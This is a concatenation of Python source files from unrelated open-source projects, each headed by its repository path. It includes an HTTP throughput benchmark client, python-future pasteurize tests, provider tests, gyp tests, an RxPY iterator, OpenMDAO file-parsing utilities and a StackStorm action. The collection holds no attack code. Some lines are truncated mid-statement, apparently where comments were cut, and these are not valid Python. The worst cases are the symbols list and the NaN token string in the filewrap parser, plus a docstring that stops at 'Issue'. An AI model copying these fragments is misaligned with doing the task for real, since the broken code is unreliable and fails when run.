sl = [s] * (num-1)
sl.append (
'GET /test%d.html HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (
request_size, host
)
)
return string.join (sl, '')
if __name__ == '__main__':
import string
import sys
if len(sys.argv) != 6:
print 'usage: %s <host> <port> <request-size> <num-requests> <num-connections>\n' % sys.argv[0]
else:
host = sys.argv[1]
ip = socket.gethostbyname (host)
[port, request_size, num_requests, num_conns] = map (
string.atoi, sys.argv[2:]
)
chain = build_request_chain (num_requests, host, request_size)
t = timer()
for i in range (num_conns):
test_client ((host,port), chain)
asyncore.loop()
total_time = t.end()
total_bytes = test_client.total_in
num_trans = num_requests * num_conns
throughput = float (total_bytes) / total_time
trans_per_sec = num_trans / total_time
sys.stderr.write ('total time: %.2f\n' % total_time)
sys.stderr.write ('number of transactions: %d\n' % num_trans)
sys.stderr.write ('total bytes sent: %d\n' % total_bytes)
sys.stderr.write ('total throughput (bytes/sec): %.2f\n' % throughput)
sys.stderr.write ('transactions/second: %.2f\n' % trans_per_sec)
sys.stderr.write ('max concurrent connections: %d\n' % test_client.max_concurrent)
sys.stdout.write (
string.join (
map (str, (num_conns, num_requests, request_size, throughput, trans_per_sec)),
','
) + '\n'
)
|
data/Immediatic/cmsplugin_vimeo/cmsplugin_vimeo/__init__.py
|
VERSION = (0,1,0,'final',1)
__version__ = '.'.join(map(str, VERSION))
def get_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version = '%s.%s' % (version, VERSION[2])
if VERSION[3:] == ('alpha', 0):
version = '%s pre-alpha' % version
else:
if VERSION[3] != 'final':
version = '%s %s %s' % (version, VERSION[3], VERSION[4])
return version
|
data/PythonCharmers/python-future/tests/test_future/test_pasteurize.py
|
"""
This module contains snippets of Python 3 code (invalid Python 2) and
tests for whether they can be passed to ``pasteurize`` and
immediately run under both Python 2 and Python 3.
"""
from __future__ import print_function, absolute_import
import pprint
from subprocess import Popen, PIPE
import tempfile
import os
from future.tests.base import CodeHandler, unittest, skip26
class TestPasteurize(CodeHandler):
"""
After running ``pasteurize``, these Python 3 code snippets should run
on both Py3 and Py2.
"""
def setUp(self):
_, self.textfilename = tempfile.mkstemp(text=True)
super(TestPasteurize, self).setUp()
def tearDown(self):
os.unlink(self.textfilename)
@skip26
def test_range_slice(self):
"""
After running ``pasteurize``, this Python 3 code should run
quickly on both Py3 and Py2 without a MemoryError
"""
code = '''
for i in range(10**8)[:10]:
pass
'''
self.unchanged(code, from3=True)
def test_print(self):
"""
This Python 3-only code is a SyntaxError on Py2 without the
print_function import from __future__.
"""
code = '''
import sys
print('Hello', file=sys.stderr)
'''
self.unchanged(code, from3=True)
def test_division(self):
"""
True division should not be screwed up by conversion from 3 to both
"""
code = '''
x = 3 / 2
assert x == 1.5
'''
self.unchanged(code, from3=True)
@unittest.expectedFailure
def test_exception_indentation(self):
"""
As of v0.11.2, pasteurize broke the indentation of ``raise`` statements
using with_traceback. Test for this.
"""
before = '''
import sys
if True:
try:
'string' + 1
except TypeError:
ty, va, tb = sys.exc_info()
raise TypeError("can't do that!").with_traceback(tb)
'''
after = '''
import sys
from future.utils import raise_with_traceback
if True:
try:
'string' + 1
except TypeError:
ty, va, tb = sys.exc_info()
raise_with_traceback(TypeError("can't do that!"), tb)
'''
self.convert_check(before, after, from3=True)
@unittest.expectedFailure
def test_urllib_request(self):
"""
Example Python 3 code using the new urllib.request module.
Does the ``pasteurize`` script handle this?
"""
before = """
import pprint
import urllib.request
URL = 'http://pypi.python.org/pypi/{}/json'
package = 'future'
r = urllib.request.urlopen(URL.format(package))
pprint.pprint(r.read())
"""
after = """
import pprint
import future.standard_library.urllib.request as urllib_request
URL = 'http://pypi.python.org/pypi/{}/json'
package = 'future'
r = urllib_request.urlopen(URL.format(package))
pprint.pprint(r.read())
"""
self.convert_check(before, after, from3=True)
def test_urllib_refactor2(self):
before = """
import urllib.request, urllib.parse
f = urllib.request.urlopen(url, timeout=15)
filename = urllib.parse.urlparse(url)[2].split('/')[-1]
"""
after = """
from future.standard_library.urllib import request as urllib_request
from future.standard_library.urllib import parse as urllib_parse
f = urllib_request.urlopen(url, timeout=15)
filename = urllib_parse.urlparse(url)[2].split('/')[-1]
"""
def test_correct_exit_status(self):
"""
Issue
status code. This is because the status code returned from
libfuturize.main.main() etc. was a ``newint``, which sys.exit() always
translates into 1!
"""
from libpasteurize.main import main
retcode = main([self.textfilename])
self.assertTrue(isinstance(retcode, int))
class TestFuturizeAnnotations(CodeHandler):
@unittest.expectedFailure
def test_return_annotations_alone(self):
before = "def foo() -> 'bar': pass"
after = """
def foo(): pass
foo.__annotations__ = {'return': 'bar'}
"""
self.convert_check(before, after, from3=True)
b = """
def foo() -> "bar":
print "baz"
print "what's next, again?"
"""
a = """
def foo():
print "baz"
print "what's next, again?"
"""
self.convert_check(b, a, from3=True)
@unittest.expectedFailure
def test_single_param_annotations(self):
b = "def foo(bar:'baz'): pass"
a = """
def foo(bar): pass
foo.__annotations__ = {'bar': 'baz'}
"""
self.convert_check(b, a, from3=True)
b = """
def foo(bar:"baz"="spam"):
print("what's next, again?")
print("whatever.")
"""
a = """
def foo(bar="spam"):
print("what's next, again?")
print("whatever.")
foo.__annotations__ = {'bar': 'baz'}
"""
self.convert_check(b, a, from3=True)
def test_multiple_param_annotations(self):
b = "def foo(bar:'spam'=False, baz:'eggs'=True, ham:False='spaghetti'): pass"
a = "def foo(bar=False, baz=True, ham='spaghetti'): pass"
self.convert_check(b, a, from3=True)
b = """
def foo(bar:"spam"=False, baz:"eggs"=True, ham:False="spam"):
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
a = """
def foo(bar=False, baz=True, ham="spam"):
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
self.convert_check(b, a, from3=True)
def test_mixed_annotations(self):
b = "def foo(bar=False, baz:'eggs'=True, ham:False='spaghetti') -> 'zombies': pass"
a = "def foo(bar=False, baz=True, ham='spaghetti'): pass"
self.convert_check(b, a, from3=True)
b = """
def foo(bar:"spam"=False, baz=True, ham:False="spam") -> 'air':
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
a = """
def foo(bar=False, baz=True, ham="spam"):
print("this is filler, just doing a suite")
print("suites require multiple lines.")
"""
self.convert_check(b, a, from3=True)
b = "def foo(bar) -> 'brains': pass"
a = "def foo(bar): pass"
self.convert_check(b, a, from3=True)
def test_functions_unchanged(self):
s = "def foo(): pass"
self.unchanged(s, from3=True)
s = """
def foo():
pass
pass
"""
self.unchanged(s, from3=True)
s = """
def foo(bar='baz'):
pass
pass
"""
self.unchanged(s, from3=True)
if __name__ == '__main__':
unittest.main()
|
data/Impactstory/total-impact-webapp/test/unit_tests/providers/test_provider.py
|
from totalimpact.providers import provider
from totalimpact.providers.provider import Provider, ProviderFactory
from totalimpactwebapp import app, db
from nose.tools import assert_equals, nottest
from xml.dom import minidom
from test.utils import setup_postgres_for_unittests, teardown_postgres_for_unittests
import simplejson, BeautifulSoup
import os
from sqlalchemy.sql import text
sampledir = os.path.join(os.path.split(__file__)[0], "../../../extras/sample_provider_pages/")
class Test_Provider():
TEST_PROVIDER_CONFIG = [
("pubmed", { "workers":1 }),
("wikipedia", {"workers": 3}),
("mendeley", {"workers": 3}),
]
TEST_JSON = """{"repository":{"homepage":"","watchers":7,"has_downloads":true,"fork":false,"language":"Java","has_issues":true,"has_wiki":true,"forks":0,"size":4480,"private":false,"created_at":"2008/09/29 04:26:42 -0700","name":"gtd","owner":"egonw","description":"Git-based ToDo tool.","open_issues":2,"url":"https://github.com/egonw/gtd","pushed_at":"2012/02/28 10:21:26 -0800"}}"""
TEST_XML = open(os.path.join(sampledir, "facebook", "metrics")).read()
def setUp(self):
self.db = setup_postgres_for_unittests(db, app)
def tearDown(self):
teardown_postgres_for_unittests(self.db)
def test_get_provider(self):
provider = ProviderFactory.get_provider("wikipedia")
assert_equals(provider.__class__.__name__, "Wikipedia")
def test_get_providers(self):
providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG)
provider_names = [provider.__class__.__name__ for provider in providers]
assert_equals(set(provider_names), set(['Mendeley', 'Wikipedia', "Pubmed"]))
def test_get_providers_filters_by_metrics(self):
providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG, "metrics")
provider_names = [provider.__class__.__name__ for provider in providers]
assert_equals(set(provider_names), set(['Mendeley', 'Wikipedia', "Pubmed"]))
def test_get_providers_filters_by_biblio(self):
providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG, "biblio")
provider_names = [provider.__class__.__name__ for provider in providers]
assert_equals(set(provider_names), set(['Pubmed', 'Mendeley']))
def test_get_providers_filters_by_aliases(self):
providers = ProviderFactory.get_providers(self.TEST_PROVIDER_CONFIG, "aliases")
provider_names = [provider.__class__.__name__ for provider in providers]
assert_equals(set(provider_names), set(['Pubmed', 'Mendeley']))
def test_lookup_json(self):
page = self.TEST_JSON
data = simplejson.loads(page)
response = provider._lookup_json(data, ['repository', 'name'])
assert_equals(response, u'gtd')
def test_extract_json(self):
page = self.TEST_JSON
dict_of_keylists = {
'title' : ['repository', 'name'],
'description' : ['repository', 'description']}
response = provider._extract_from_json(page, dict_of_keylists)
assert_equals(response, {'description': u'Git-based ToDo tool.', 'title': u'gtd'})
def test_lookup_xml_from_dom(self):
page = self.TEST_XML
doc = minidom.parseString(page.strip())
response = provider._lookup_xml_from_dom(doc, ['total_count'])
assert_equals(response, 17)
def test_lookup_xml_from_soup(self):
page = self.TEST_XML
doc = BeautifulSoup.BeautifulStoneSoup(page)
response = provider._lookup_xml_from_soup(doc, ['total_count'])
assert_equals(response, 17)
def test_extract_xml(self):
page = self.TEST_XML
dict_of_keylists = {
'count' : ['total_count']}
response = provider._extract_from_xml(page, dict_of_keylists)
assert_equals(response, {'count': 17})
def test_doi_from_url_string(self):
test_url = "https://knb.ecoinformatics.org/knb/d1/mn/v1/object/doi:10.5063%2FAA%2Fnrs.373.1"
expected = "10.5063/AA/nrs.373.1"
response = provider.doi_from_url_string(test_url)
assert_equals(response, expected)
def test_is_issn_in_doaj_false(self):
response = provider.is_issn_in_doaj("invalidissn")
assert_equals(response, False)
def test_is_issn_in_doaj_true(self):
zookeys_issn = "13132989"
response = provider.is_issn_in_doaj(zookeys_issn)
assert_equals(response, True)
def test_import_products(self):
response = provider.import_products("product_id_strings",
{"product_id_strings": ["123456", "HTTPS://starbucks.com", "arXiv:1305.3328", "http://doi.org/10.123/ABC"]})
expected = [('pmid', '123456'), ('url', 'HTTPS://starbucks.com'), ('arxiv', '1305.3328'), ('doi', '10.123/abc')]
assert_equals(response, expected)
def test_import_products_bad_providername(self):
response = provider.import_products("nonexistant", {})
expected = []
assert_equals(response, expected)
class TestProviderFactory():
TEST_PROVIDER_CONFIG = [
("pubmed", { "workers":1 }),
("wikipedia", {"workers": 3}),
("mendeley", {"workers": 3}),
]
def test_get_all_static_meta(self):
sm = ProviderFactory.get_all_static_meta(self.TEST_PROVIDER_CONFIG)
expected = 'The number of citations by papers in PubMed Central'
assert_equals(sm["pubmed:pmc_citations"]["description"], expected)
def test_get_all_metric_names(self):
response = ProviderFactory.get_all_metric_names(self.TEST_PROVIDER_CONFIG)
expected = ['wikipedia:mentions', 'mendeley:country', 'pubmed:pmc_citations_reviews', 'mendeley:discipline', 'pubmed:f1000', 'mendeley:career_stage', 'pubmed:pmc_citations_editorials', 'mendeley:readers', 'pubmed:pmc_citations', 'mendeley:groups']
assert_equals(response, expected)
def test_get_all_metadata(self):
md = ProviderFactory.get_all_metadata(self.TEST_PROVIDER_CONFIG)
print md["pubmed"]
assert_equals(md["pubmed"]['url'], 'http://pubmed.gov')
|
data/adblockplus/gyp/test/msvs/express/gyptest-express.py
|
"""
Verifies that flat solutions get generated for Express versions of
Visual Studio.
"""
import TestGyp
test = TestGyp.TestGyp(formats=['msvs'])
test.run_gyp('express.gyp', '-G', 'msvs_version=2005')
test.must_contain('express.sln', '(base)')
test.run_gyp('express.gyp', '-G', 'msvs_version=2008')
test.must_contain('express.sln', '(base)')
test.run_gyp('express.gyp', '-G', 'msvs_version=2005e')
test.must_not_contain('express.sln', '(base)')
test.run_gyp('express.gyp', '-G', 'msvs_version=2008e')
test.must_not_contain('express.sln', '(base)')
test.pass_test()
|
data/adblockplus/gyp/test/hard_dependency/gyptest-exported-hard-dependency.py
|
"""
Verify that a hard_dependency that is exported is pulled in as a dependency
for a target if the target is a static library and if the generator will
remove dependencies between static libraries.
"""
import TestGyp
test = TestGyp.TestGyp()
if test.format == 'dump_dependency_json':
test.skip_test('Skipping test; dependency JSON does not adjust ' \
'static libraries.\n')
test.run_gyp('hard_dependency.gyp', chdir='src')
chdir = 'relocate/src'
test.relocate('src', chdir)
test.build('hard_dependency.gyp', 'c', chdir=chdir)
test.built_file_must_exist('a', type=test.STATIC_LIB, chdir=chdir)
test.built_file_must_not_exist('b', type=test.STATIC_LIB, chdir=chdir)
test.built_file_must_exist('c', type=test.STATIC_LIB, chdir=chdir)
test.built_file_must_not_exist('d', type=test.STATIC_LIB, chdir=chdir)
test.pass_test()
|
data/ReactiveX/RxPY/rx/linq/observable/blocking/toiterable.py
|
import threading
from rx.blockingobservable import BlockingObservable
from rx.internal import extensionmethod
from rx.internal.enumerator import Enumerator
@extensionmethod(BlockingObservable)
def to_iterable(self):
"""Returns an iterator that can iterate over items emitted by this
`BlockingObservable`.
:returns: An iterator that can iterate over the items emitted by this
`BlockingObservable`.
:rtype: Iterable[Any]
"""
condition = threading.Condition()
notifications = []
def on_next(value):
"""Takes on_next values and appends them to the notification queue"""
condition.acquire()
notifications.append(value)
condition.notify()
condition.release()
self.observable.materialize().subscribe(on_next)
def gen():
"""Generator producing values for the iterator"""
while True:
condition.acquire()
while not len(notifications):
condition.wait()
notification = notifications.pop(0)
if notification.kind == "E":
raise notification.exception
if notification.kind == "C":
return
condition.release()
yield notification.value
return Enumerator(gen())
@extensionmethod(BlockingObservable)
def __iter__(self):
"""Returns an iterator that can iterate over items emitted by this
`BlockingObservable`.
:param BlockingObservable self: Blocking observable instance.
:returns: An iterator that can iterate over the items emitted by this
`BlockingObservable`.
:rtype: Iterable[Any]
"""
return self.to_iterable()
|
data/OpenMDAO/OpenMDAO-Framework/openmdao.util/src/openmdao/util/filewrap.py
|
"""
A collection of utilities for file wrapping.
Note: This is a work in progress.
"""
import re
from pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \
TokenConverter, Word, nums, oneOf, printables, \
ParserElement, alphanums
from numpy import append, array, zeros
def _getformat(val):
if int(val) == val:
return "%.1f"
else:
return "%.16g"
class _SubHelper(object):
"""Replaces file text at the correct word location in a line. This
class contains the Helper Function that is passed to re.sub, etc."""
def __init__(self):
self.newtext = ""
self.replace_location = 0
self.current_location = 0
self.counter = 0
self.start_location = 0
self.end_location = 0
def set(self, newtext, location):
"""Sets a new word location and value for replacement."""
self.newtext = newtext
self.replace_location = location
self.current_location = 0
def set_array(self, newtext, start_location, end_location):
"""For an array, sets a new starting location, ending location, and
value for replacement."""
self.newtext = newtext
self.start_location = start_location
self.end_location = end_location
self.current_location = 0
def replace(self, text):
"""This function should be passed to re.sub.
Outputs newtext if current_location = replace_location
Otherwise, outputs the input text."""
self.current_location += 1
if self.current_location == self.replace_location:
if isinstance(self.newtext, float):
return _getformat(self.newtext) % self.newtext
else:
return str(self.newtext)
else:
return text.group()
def replace_array(self, text):
"""This function should be passed to re.sub.
Outputs newtext if current_location = replace_location
Otherwise, outputs the input text."""
self.current_location += 1
end = len(self.newtext)
if self.current_location >= self.start_location and \
self.current_location <= self.end_location and \
self.counter < end:
if isinstance(self.newtext[self.counter], float):
val = self.newtext[self.counter]
newval = _getformat(val) % val
else:
newval = str(self.newtext[self.counter])
self.counter += 1
return newval
else:
return text.group()
class ToInteger(TokenConverter):
"""Converter for PyParsing that is used to turn a token into an int."""
def postParse( self, instring, loc, tokenlist ):
"""Converter to make token into an integer."""
return int(tokenlist[0])
class ToFloat(TokenConverter):
"""Converter for PyParsing that is used to turn a token into a float."""
def postParse( self, instring, loc, tokenlist ):
"""Converter to make token into a float."""
return float(tokenlist[0].replace('D', 'E'))
class ToNan(TokenConverter):
"""Converter for PyParsing that is used to turn a token into Python nan."""
def postParse( self, instring, loc, tokenlist ):
"""Converter to make token into Python nan."""
return float('nan')
class ToInf(TokenConverter):
"""Converter for PyParsing that is used to turn a token into Python inf."""
def postParse( self, instring, loc, tokenlist ):
"""Converter to make token into Python inf."""
return float('inf')
class InputFileGenerator(object):
"""Utility to generate an input file from a template.
Substitution of values is supported. Data is located with
a simple API."""
def __init__(self):
self.template_filename = []
self.output_filename = []
self.delimiter = " "
self.reg = re.compile('[^ \n]+')
self.data = []
self.current_row = 0
self.anchored = False
def set_template_file(self, filename):
"""Set the name of the template file to be used The template
file is also read into memory when this method is called.
filename: str
Name of the template file to be used."""
self.template_filename = filename
templatefile = open(filename, 'r')
self.data = templatefile.readlines()
templatefile.close()
def set_generated_file(self, filename):
"""Set the name of the file that will be generated.
filename: str
Name of the input file to be generated."""
self.output_filename = filename
def set_delimiters(self, delimiter):
"""Lets you change the delimiter that is used to identify field
boundaries.
delimiter: str
A string containing characters to be used as delimiters."""
self.delimiter = delimiter
self.reg = re.compile('[^' + delimiter + '\n]+')
def mark_anchor(self, anchor, occurrence=1):
"""Marks the location of a landmark, which lets you describe data by
relative position. Note that a forward search begins at the old anchor
location. If you want to restart the search for the anchor at the file
beginning, then call ``reset_anchor()`` before ``mark_anchor``.
anchor: str
The text you want to search for.
occurrence: integer
Find nth instance of text; default is 1 (first). Use -1 to
find last occurrence. Reverse searches always start at the end
of the file no matter the state of any previous anchor."""
if not isinstance(occurrence, int):
raise ValueError("The value for occurrence must be an integer")
instance = 0
if occurrence > 0:
count = 0
max_lines = len(self.data)
for index in xrange(self.current_row, max_lines):
line = self.data[index]
if count == 0 and self.anchored:
line = line.split(anchor)[-1]
if line.find(anchor) > -1:
instance += 1
if instance == occurrence:
self.current_row += count
self.anchored = True
return
count += 1
elif occurrence < 0:
max_lines = len(self.data)-1
count = max_lines
for index in xrange(max_lines, -1, -1):
line = self.data[index]
if count == max_lines and self.anchored:
line = line.split(anchor)[0]
if line.find(anchor) > -1:
instance += -1
if instance == occurrence:
self.current_row = count
self.anchored = True
return
count -= 1
else:
raise ValueError("0 is not valid for an anchor occurrence.")
raise RuntimeError("Could not find pattern %s in template file %s" % \
(anchor, self.template_filename))
def reset_anchor(self):
"""Resets anchor to the beginning of the file."""
self.current_row = 0
self.anchored = False
def transfer_var(self, value, row, field):
"""Changes a single variable in the template relative to the
current anchor.
row - number of lines offset from anchor line (0 is anchor line).
This can be negative.
field - which word in line to replace, as denoted by delimiter(s)"""
j = self.current_row + row
line = self.data[j]
sub = _SubHelper()
sub.set(value, field)
newline = re.sub(self.reg, sub.replace, line)
self.data[j] = newline
def transfer_array(self, value, row_start, field_start, field_end,
row_end=None, sep=", "):
"""Changes the values of an array in the template relative to the
current anchor. This should generally be used for one-dimensional
or free form arrays.
value: float, integer, bool, str
Array of values to insert.
row_start: integer
Starting row for inserting the array. This is relative
to the anchor, and can be negative.
field_start: integer
Starting field in the given row_start as denoted by
delimiter(s).
field_end: integer
The final field the array uses in row_end.
We need this to figure out if the template is too small or large
row_end: integer (optional)
Use if the array wraps to cover additional lines.
sep: integer (optional)
Separator to use if we go beyond the template."""
if row_end == None:
row_end = row_start
sub = _SubHelper()
for row in range(row_start, row_end+1):
j = self.current_row + row
line = self.data[j]
if row == row_end:
f_end = field_end
else:
f_end = 99999
sub.set_array(value, field_start, f_end)
field_start = 0
newline = re.sub(self.reg, sub.replace_array, line)
self.data[j] = newline
if sub.counter < len(value):
for val in value[sub.counter:]:
newline = newline.rstrip() + sep + str(val)
self.data[j] = newline
elif sub.counter > len(value):
raise ValueError("Array is too small for the template.")
self.data[j] += "\n"
def transfer_2Darray(self, value, row_start, row_end, field_start,
field_end, sep=", "):
"""Changes the values of a 2D array in the template relative to the
current anchor. This method is specialized for 2D arrays, where each
row of the array is on its own line.
value: ndarray
Array of values to insert.
row_start: integer
Starting row for inserting the array. This is relative
to the anchor, and can be negative.
row_end: integer
Final row for the array, relative to the anchor.
field_start: integer
starting field in the given row_start as denoted by
delimiter(s).
field_end: integer
The final field the array uses in row_end.
We need this to figure out if the template is too small or large.
sep: str (optional) (currently unsupported)
Separator to append between values if we go beyond the template."""
sub = _SubHelper()
i = 0
for row in range(row_start, row_end+1):
j = self.current_row + row
line = self.data[j]
sub.set_array(value[i, :], field_start, field_end)
newline = re.sub(self.reg, sub.replace_array, line)
self.data[j] = newline
sub.current_location = 0
sub.counter = 0
i += 1
def clearline(self, row):
"""Replace the contents of a row with the newline character.
row: integer
Row number to clear, relative to current anchor."""
self.data[self.current_row + row] = "\n"
def generate(self):
"""Use the template file to generate the input file."""
infile = open(self.output_filename, 'w')
infile.writelines(self.data)
infile.close()
class FileParser(object):
"""Utility to locate and read data from a file."""
def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):
self.filename = []
self.data = []
self.delimiter = " \t"
self.end_of_line_comment_char = end_of_line_comment_char
self.full_line_comment_char = full_line_comment_char
self.current_row = 0
self.anchored = False
self.set_delimiters(self.delimiter)
def set_file(self, filename):
"""Set the name of the file that will be generated.
filename: str
Name of the input file to be generated."""
self.filename = filename
inputfile = open(filename, 'r')
if not self.end_of_line_comment_char and not self.full_line_comment_char:
self.data = inputfile.readlines()
else:
self.data = []
for line in inputfile :
if line[0] == self.full_line_comment_char:
continue
self.data.append( line.split( self.end_of_line_comment_char )[0] )
inputfile.close()
def set_delimiters(self, delimiter):
"""Lets you change the delimiter that is used to identify field
boundaries.
delimiter: str
A string containing characters to be used as delimiters. The
default value is ' \t', which means that spaces and tabs are not
taken as data but instead mark the boundaries. Note that the
parser is smart enough to recognize characters within quotes as
non-delimiters."""
self.delimiter = delimiter
if delimiter != "columns":
ParserElement.setDefaultWhitespaceChars(str(delimiter))
self._reset_tokens()
def mark_anchor(self, anchor, occurrence=1):
"""Marks the location of a landmark, which lets you describe data by
relative position. Note that a forward search begins at the old anchor
location. If you want to restart the search for the anchor at the file
beginning, then call ``reset_anchor()`` before ``mark_anchor``.
anchor: str
The text you want to search for.
occurrence: integer
Find nth instance of text; default is 1 (first). Use -1 to
find last occurrence. Reverse searches always start at the end
of the file no matter the state of any previous anchor."""
if not isinstance(occurrence, int):
raise ValueError("The value for occurrence must be an integer")
instance = 0
if occurrence > 0:
count = 0
max_lines = len(self.data)
for index in xrange(self.current_row, max_lines):
line = self.data[index]
if count == 0 and self.anchored:
line = line.split(anchor)[-1]
if anchor in line:
instance += 1
if instance == occurrence:
self.current_row += count
self.anchored = True
return
count += 1
elif occurrence < 0:
max_lines = len(self.data)-1
count = max_lines
for index in xrange(max_lines, -1, -1):
line = self.data[index]
if count == max_lines and self.anchored:
line = line.split(anchor)[0]
if anchor in line:
instance += -1
if instance == occurrence:
self.current_row = count
self.anchored = True
return
count -= 1
else:
raise ValueError("0 is not valid for an anchor occurrence.")
raise RuntimeError("Could not find pattern %s in output file %s" % \
(anchor, self.filename))
def reset_anchor(self):
"""Resets anchor to the beginning of the file."""
self.current_row = 0
self.anchored = False
def transfer_line(self, row):
"""Returns a whole line, relative to current anchor.
row: integer
Number of lines offset from anchor line (0 is anchor line).
This can be negative."""
return self.data[self.current_row + row].rstrip()
def transfer_var(self, row, field, fieldend=None):
"""Grabs a single variable relative to the current anchor.
--- If the delimiter is a set of chars (e.g., ", ") ---
row: integer
Number of lines offset from anchor line (0 is anchor line).
This can be negative.
field: integer
Which word in line to retrieve.
fieldend - IGNORED
--- If the delimiter is "columns" ---
row: integer
Number of lines offset from anchor line (0 is anchor line).
This can be negative.
field: integer
Character position to start.
fieldend: integer (optional)
Position of last character to return. If omitted, the end of
the line is used."""
j = self.current_row + row
line = self.data[j]
if self.delimiter == "columns":
if not fieldend:
line = line[(field-1):]
else:
line = line[(field-1):(fieldend)]
data = self._parse_line().parseString(line)
if len(data) > 1:
return line
else:
return data[0]
else:
data = self._parse_line().parseString(line)
return data[field-1]
def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):
"""Searches for a key relative to the current anchor and then grabs
a field from that line.
field: integer
Which field to transfer. Field 0 is the key.
occurrence: integer
Find nth instance of text; default is 1 (first value
field). Use -1 to find last occurance. Position 0 is the key
field, so it should not be used as a value for occurrence.
rowoffset: integer (optional)
Optional row offset from the occurrence of key. This can
also be negative.
You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.
This function just combines them for convenience."""
if not isinstance(occurrence, int) or occurrence==0:
msg = "The value for occurrence must be a nonzero integer"
raise ValueError(msg)
instance = 0
if occurrence > 0:
row = 0
for line in self.data[self.current_row:]:
if line.find(key) > -1:
instance += 1
if instance == occurrence:
break
row += 1
elif occurrence < 0:
row = -1
for line in reversed(self.data[self.current_row:]):
if line.find(key) > -1:
instance += -1
if instance == occurrence:
break
row -= 1
j = self.current_row + row + rowoffset
line = self.data[j]
fields = self._parse_line().parseString(line.replace(key,"KeyField"))
return fields[field]
def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):
"""Grabs an array of variables relative to the current anchor.
rowstart: integer
Row number to start, relative to the current anchor.
fieldstart: integer
Field number to start.
rowend: integer (optional)
Row number to end. If not set, then only one row is grabbed.
Setting the delimiter to 'columns' elicits some special behavior
from this method. Normally, the extraction process wraps around
at the end of a line and continues grabbing each field at the start of
a newline. When the delimiter is set to columns, the parameters
(rowstart, fieldstart, rowend, fieldend) demark a box, and all
values in that box are retrieved. Note that standard whitespace
is the secondary delimiter in this case.
"""
j1 = self.current_row + rowstart
if rowend is None:
j2 = j1 + 1
else:
j2 = self.current_row + rowend + 1
if not fieldend:
raise ValueError("fieldend is missing, currently required")
lines = self.data[j1:j2]
data = zeros(shape=(0, 0))
for i, line in enumerate(lines):
if self.delimiter == "columns":
line = line[(fieldstart-1):fieldend]
line = line.strip()
parsed = self._parse_line().parseString(line)
newdata = array(parsed[:])
if '|S' in str(newdata.dtype):
newdata = array(line)
data = append(data, newdata)
else:
parsed = self._parse_line().parseString(line)
if i == j2-j1-1:
data = append(data, array(parsed[(fieldstart-1):fieldend]))
else:
data = append(data, array(parsed[(fieldstart-1):]))
fieldstart = 1
return data
def transfer_2Darray(self, rowstart, fieldstart, rowend, fieldend=None):
"""Grabs a 2D array of variables relative to the current anchor. Each
line of data is placed in a separate row.
rowstart: integer
Row number to start, relative to the current anchor.
fieldstart: integer
Field number to start.
rowend: integer
Row number to end relative to current anchor.
fieldend: integer (optional)
Field number to end. If not specified, grabs all fields up to the
end of the line.
If the delimiter is set to 'columns', then the values contained in
fieldstart and fieldend should be the column number instead of the
field number.
"""
if fieldend and (fieldstart > fieldend):
msg = "fieldend must be greater than fieldstart"
raise ValueError(msg)
if rowstart > rowend:
msg = "rowend must be greater than rowstart"
raise ValueError(msg)
j1 = self.current_row + rowstart
j2 = self.current_row + rowend + 1
lines = list(self.data[j1:j2])
if self.delimiter == "columns":
if fieldend:
line = lines[0][(fieldstart-1):fieldend]
else:
line = lines[0][(fieldstart-1):]
parsed = self._parse_line().parseString(line)
row = array(parsed[:])
data = zeros(shape=(abs(j2-j1), len(row)))
data[0, :] = row
for i, line in enumerate(list(lines[1:])):
if fieldend:
line = line[(fieldstart-1):fieldend]
else:
line = line[(fieldstart-1):]
parsed = self._parse_line().parseString(line)
data[i+1, :] = array(parsed[:])
else:
parsed = self._parse_line().parseString(lines[0])
if fieldend:
row = array(parsed[(fieldstart-1):fieldend])
else:
row = array(parsed[(fieldstart-1):])
data = zeros(shape=(abs(j2-j1), len(row)))
data[0, :] = row
for i, line in enumerate(list(lines[1:])):
parsed = self._parse_line().parseString(line)
if fieldend:
try:
data[i+1, :] = array(parsed[(fieldstart-1):fieldend])
except:
print data
else:
data[i+1, :] = array(parsed[(fieldstart-1):])
return data
def _parse_line(self):
"""Parse a single data line that may contain string or numerical data.
Float and Int 'words' are converted to their appropriate type.
Exponentiation is supported, as are NaN and Inf."""
return self.line_parse_token
def _reset_tokens(self):
''' Sets up the tokens for pyparsing '''
if self.delimiter.isspace():
textchars = printables
else:
textchars = alphanums
symbols = ['.', '/', '+', '*', '^', '(', ')', '[', ']', '=',
':', ';', '?', '%', '&', '!', '
'{', '}', '-', '_', '@', '$', '~']
for symbol in symbols:
if symbol not in self.delimiter:
textchars = textchars + symbol
digits = Word(nums)
dot = "."
sign = oneOf("+ -")
ee = CaselessLiteral('E') | CaselessLiteral('D')
num_int = ToInteger(Combine( Optional(sign) + digits ))
num_float = ToFloat(Combine( Optional(sign) +
((digits + dot + Optional(digits)) |
(dot + digits)) +
Optional(ee + Optional(sign) + digits)
))
mixed_exp = ToFloat(Combine( digits + ee + Optional(sign) + digits ))
nan = ToInf(oneOf("Inf -Inf")) | \
ToNan(oneOf("NaN nan NaN% NaNQ NaNS qNaN sNaN " + \
"1.
string_text = Word(textchars)
self.line_parse_token = ( OneOrMore( (nan | num_float | mixed_exp | num_int |
string_text) ) )
|
data/StackStorm/st2contrib/packs/st2/actions/kv_get_object.py
|
import json
from lib.action import St2BaseAction
__all__ = [
'St2KVPGetObjectAction'
]
class St2KVPGetObjectAction(St2BaseAction):
def run(self, key):
_key = self.client.keys.get_by_name(key)
if _key:
deserialized_value = json.loads(_key.value)
return deserialized_value
else:
raise Exception("Key does not exist")
|
data/JamesRitchie/django-rest-framework-sav/rest_framework_sav/__init__.py
|
"""Package adding Session Authentication view to Django REST Framework."""
__all__ = [
'views'
]
__version__ = '0.1.0'
|
data/Pegase745/sqlalchemy-datatables/examples/flask_tut/flask_tut/scripts/initializedb.py
|
"""Initialize DB with fixtures."""
from time import sleep
from flask import Flask
